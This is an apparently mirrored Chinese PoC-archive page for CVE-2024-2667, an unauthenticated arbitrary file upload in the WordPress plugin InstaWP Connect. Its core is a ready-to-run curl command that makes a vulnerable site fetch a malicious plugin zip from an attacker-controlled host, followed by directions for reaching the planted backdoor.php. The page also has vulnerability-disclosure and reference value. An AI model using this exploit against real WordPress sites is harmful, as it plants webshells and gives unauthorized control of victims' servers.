关联漏洞
标题:
WordPress plugin InstaWP Connect 安全漏洞
(CVE-2024-2667)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin InstaWP Connect 0.1.0.22 版本及之前版本存在安全漏洞,该漏洞源于 /wp-json/instawp-connect/v1/config REST API 端点中的文件验证不足,导致任意文件上传。
描述
This is POC for CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Unauthenticated Arbitrary File Upload)
介绍
# InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Unauthenticated Arbitrary File Upload
## POC (Using CURL):
```
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
```
`api_key` -> You can use any valid or invalid API Key.\
`override_plugin_zip` -> Path to the zip file which contains malicious WordPress Plugin with a backdoor.
Once imported you can access the backdoor via http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php (Assuming the directory name is malicious-plugin and backdoor.php is under that directory)
References:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/instawp-connect/instawp-connect-1-click-wp-staging-migration-01022-unauthenticated-arbitrary-file-upload
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=
文件快照
[4.0K] /data/pocs/80d450a9997db946e7d5c0686cc311fe70d05f0c
└── [1012] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。